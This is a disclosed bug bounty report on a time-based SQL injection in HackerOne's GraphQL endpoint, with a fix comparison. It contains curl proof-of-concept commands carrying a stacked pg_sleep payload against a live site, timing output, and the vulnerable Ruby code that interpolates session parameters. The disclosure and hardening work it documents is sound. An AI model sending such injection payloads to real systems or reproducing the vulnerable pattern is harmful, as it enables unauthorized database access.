SQL Injection in GraphQL Endpoint
Bug: SQL Injection
Severity: Critical (10.0)
Asset: GraphQL
Bounty Award: None
Reported by: Jobert Abma (jobert)
Vulnerability Description:
The embedded_submission_form_uuid parameter in the /graphql endpoint is
vulnerable to SQL injection. By manipulating this parameter, an attacker can
inject arbitrary SQL queries, potentially leading to unauthorized access or data
leakage.
Proof of Concept:
To reproduce the vulnerability, execute the following command with the manipulated embedded_submission_form_uuid parameter:
Locally:
curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27
HackerOne.com:
curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27
SQL Injection in GraphQL Endpoint 1
Additional Proof:
$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(5\)%3B--%27
{}curl -X POST 0.03s user 0.01s system 0% cpu 5.726 total
$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(1\)%3B--%27
{}curl -X POST 0.03s user 0.01s system 2% cpu 1.631 total
$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(10\)%3B--%27
{}curl -X POST 0.02s user 0.01s system 0% cpu 10.557 total
Impact:
The SQL injection appears to execute within the context of the secure schema.
While the full impact is currently unknown, given the ability for an attacker to
potentially switch schemas, it should be considered as having a high impact on
confidentiality.
Impacted Data:
No exploitation of the vulnerability has been detected. Further details can be
found in the report below.
Root Cause:
The vulnerability stems from the decision to use GraphQL parameters, which
were not properly sanitized, instead of input fields when introducing the
embedded submission form feature. Below is a snippet of the vulnerable code:
unless database_parameters_up_to_date
  safe_query = ''
  new_parameters.each do |key, value|
    safe_query += "SET SESSION #{key} TO #{value};" # <-- key and value interpolated without escaping
  end
  begin
    connection.query(safe_query)
  rescue ActiveRecord::StatementInvalid => e
    # NOTE: when the transaction is aborted, we cannot set or reset any parameters.
    # Changes of previous SET statements are undone as well, so we can safely do
    # nothing here
    raise e unless e.cause.is_a? PG::InFailedSqlTransaction
  end
end
The usage of parameters in PostgreSQL queries is necessitated by the
database having two separate schemas: the public schema and the secure
schema. GraphQL queries default to the secure schema, which returns data
based on user authorization. Despite this, the vulnerability poses a risk to
confidentiality.
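The added example below is not code from the report or from HackerOne: it rebuilds the SET-statement shape from the snippet above beside a hardened version that allowlists parameter names and quotes values as PostgreSQL literals, and counts how many statements each version hands to the database for the report's own payload. It assumes a hypothetical allowlist of session parameter names and that the value reaches SET wrapped in single quotes (which is what the PoC's leading 1' and trailing --' break out of); statement_count is an added helper, not a PostgreSQL API.

```ruby
require 'cgi'
# PoC value decoded from the URL-encoded parameter shown in the report.
POC_VALUE = CGI.unescape('1%27%3BSELECT%201%3BSELECT%20pg_sleep(30)%3B--%27')
# Hypothetical allowlist of session parameters the application may set.
ALLOWED_SESSION_PARAMETERS = %w[search_path embedded_submission_form_uuid].freeze

# Vulnerable shape: the request value is interpolated straight into SET. Assumption:
# the value is wrapped in single quotes, which the PoC's 1' ... --' breaks out of.
def vulnerable_session_sql(parameters)
  parameters.map { |key, value| "SET SESSION #{key} TO '#{value}';" }.join
end

# PostgreSQL string-literal quoting: every embedded single quote is doubled.
def quote_literal(value)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# Hardened shape: parameter names cannot be bound, so the key must be on a fixed
# allowlist; the value is a quoted literal, so quotes, ';' and '--' stay inside it.
def safe_session_sql(parameters)
  parameters.map do |key, value|
    key = key.to_s
    raise ArgumentError, "unknown session parameter: #{key}" unless ALLOWED_SESSION_PARAMETERS.include?(key)
    "SET SESSION #{key} TO #{quote_literal(value)};"
  end.join
end

# Counts statements as PostgreSQL's lexer would split them: ';' ends a statement only
# outside a quoted literal and outside a '--' comment; '' inside a literal is an escaped quote.
def statement_count(sql)
  count, in_literal, in_comment, i = 0, false, false, 0
  while i < sql.length
    c = sql[i]
    if in_comment
      in_comment = false if c == "\n"
    elsif in_literal
      next_is_quote = sql[i + 1] == "'"
      i += 1 if c == "'" && next_is_quote          # skip the escaped pair
      in_literal = false if c == "'" && !next_is_quote
    elsif c == "'"
      in_literal = true
    elsif c == '-' && sql[i + 1] == '-'
      in_comment = true
    elsif c == ';'
      count += 1
    end
    i += 1
  end
  count
end
```

With the PoC value, the vulnerable builder yields three statements (the SET plus the two injected SELECTs, with the trailing quote commented out), while the hardened builder yields exactly one, the whole payload sitting inside the literal.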
Recommendations:
Immediately patch the vulnerability by implementing proper parameter
sanitization in GraphQL queries.
Conduct a thorough security review to identify and address any similar
vulnerabilities in the system.
Consider restricting access to sensitive endpoints or implementing
additional authentication measures to mitigate potential risks.
Reference:
https://hackerone.com/reports/435066